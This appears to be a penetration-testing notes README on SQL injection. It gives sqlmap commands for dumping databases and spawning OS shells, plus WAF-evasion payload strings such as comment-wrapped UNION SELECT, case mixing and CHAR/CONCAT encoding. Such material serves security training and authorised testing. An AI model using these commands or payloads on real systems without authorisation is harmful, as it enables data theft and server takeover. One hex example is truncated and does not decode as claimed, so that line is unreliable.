Skip to content

Latest commit

 

History

History
264 lines (198 loc) · 13.6 KB

README.md

File metadata and controls

264 lines (198 loc) · 13.6 KB

SQL Injection

Guides and Resources

{% tabs %} {% tab title="Guides" %}

{% tab title="Payload Cheatsheets" %}

{% content-ref url="sql-tips-and-tricks.md" %} sql-tips-and-tricks.md {% endcontent-ref %}

****SQLmap ****

SQL Injection tool that can spawn a meterpreter or VNC session back to attacker. Can return a decent number of false positives. Always verify. If you do not specify a value, SQLmap will attempt all by default

{% tabs %} {% tab title="Guides and Resources" %}

{% tab title="Config/help cmds" %} Specify the database type if not SQL

--dbms=[db type]

If you need to test and authenticated SQL injection, log into website via a browserand grab the cookie (pull from burp suite)

--data=[COOKIE]

Help

# sqlmap --wizard

{% endtab %}

{% tab title="Cmds - GET" %}

Commands GET parameter - injection passed in the URL itself

Test if sql inject is valid (will return banner on success)

# sqlmap -u "http://domain.com?user=test&pass=test" -b

Retrieve a database username

# sqlmap -u "http://domain.com?user=test&pass=test" --current-user

Crawl target

sqlmap -u http://10.10.10.10 --crawl=1

Dump Database

sqlmap -u http://10.10.10.10 --dbms=mysql --dump

Spawn interactive shell

# sqlmap -u "http://domain.com?user=test&pass=test" --os-shell

WAF bypass and shell setup

# sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --os-shell

{% endtab %}

{% tab title="Cmds - POST" %}

Commands POST parameter - injection passed in the data section

Test if sql inject is valid (will return banner on success)

# sqlmap -u “http://domain.com” --data="user=test&pass=test" -b

{% endtab %} {% endtabs %}

SQLmap with Burp
  • Start SQLmap API on your kali box while Burp Proxy Pro can be runnign anywhere
  • When Burp finds an SQL injection, it will connect to SQLmap's running API to automaticallu attack the vulnerable parameters.
  • Start SQLmap API
    • # cd /opt/sqlmap
    • # python sqlmapapi.py -s [ip] -p [port]

{% embed url="https://youtu.be/2YD4vygeghM" %}

Other Tools

Other Tools

SQL Basics

{% content-ref url="sql-methodology.md" %} sql-methodology.md {% endcontent-ref %}

Attack Techniques

Filter evasion
  • Many applications use web application firewalls (WAF) to help protect against any kind of SQL injection vulnerability. The only problem is that WAFs only look for certain words, characters, or patterns, meaning certain special characters used in combination can be used to evade WAF filter protection.
  • For example, a very basic WAF may filter out specific SQL keywords such as OR, SELECT, UNION or WHERE to prevent them from being used in SQL injection attacks.
  • Methods
    • Capitalization - If the WAF's filter, like the one described above, is implemented poorly, then there may be ways to evade it by using variations of the word being filtered out. The most straightforward example is where we can bypass the filter by capitalizing some letters in the keyword, like this:
      • Or, SeLeCt, UNioN and wHEre.
    • URL Encoding - In cases where the query forms part of a URL, URL encoding may be a viable option for evading the filter. For example %55 is ‘U’ and %53 is ‘S’. The WAF may not identify these encoded characters, and may send them to the server which decodes and processes them as the intended keywords.
    • Multi-line Comments - the use of multi-line comments, such as “/*” and “*/”, may cause the WAF filter to miss the keywords. MySQL will read the content between the two comment lines and execute it as SQL, whereas the DBMS may not flag it up.
      • /*!%55NiOn*/ /*!%53eLEct*//**//*!12345UNION SELECT*//**//**//*!50000UNION SELECT*//**//**/UNION/**//*!50000SELECT*//**/
      • The ‘+’ can be used to build an injection query without the use of quotes.
        +union+distinct+select++union+distinctROW+select+
    • Inline Comments - To bypass certain filters, you can abuse the inline comment system within MySQL using #.
      • +#uNiOn+#sEleCt
    • Reverse Function - To bypass a filter looking for certain strings, you can use the REVERSE function which will evaluate the correct way around at run time. However, when going through the filter, it will be seen as ‘noinu’ instead of ‘union’.
      • REVERSE('noinu')+REVERSE('tceles')
    • String Splitting - You can split strings within the query to bypass various filters. MySQL will still execute them as keywords.
      • un?+un/**/ion+se/**/lect+
String Concatenation

An input field may restrict the usage of certain datatypes and/or words/punctuation. This can make the exploitation of SQL injection vulnerabilities a little bit more difficult. However, two functions can be used in conjunction to bypass filters such as these:CHAR() and CONCAT().

Syntax & examples

  • Within MySQL, you have to use quotation marks to input a string into a statement. However, with the use of string functions and encoding methods, you can get past this hurdle.
  • To concatenate various strings inside a statement, the MySQL function CONCAT is available.
    • CONCAT(str1, str2, str3)
    • SELECT CONCAT(login, email) FROM users
  • Another way to create strings without the use of quotes is the MySQL's CHAR function, which returns a character related to the integer passed to it. For example, CHAR(75) returns K.
    CHAR and CONCAT are often used together to create full sets of strings which bypass specific string filtering. This means you don't need quotation marks in the query.
    • SELECT CONCAT(CHAR(77),CHAR(76),CHAR(75))
    • This will select data from a database that is of ‘MLK’.
  • Encoding methods are another way to manipulate strings.
    Strings can be encoded into their Hex values either by passing a hex value or using the HEX() function.
  • For example, the string 'password' can be passed to an SQL statement like this: SELECT 0x70617373776f726
Retrieve Hidden Data
Subvert App Logic/Login Bypass

Manual Injection Methodology

{% content-ref url="manual-injection-methodology.md" %} manual-injection-methodology.md {% endcontent-ref %}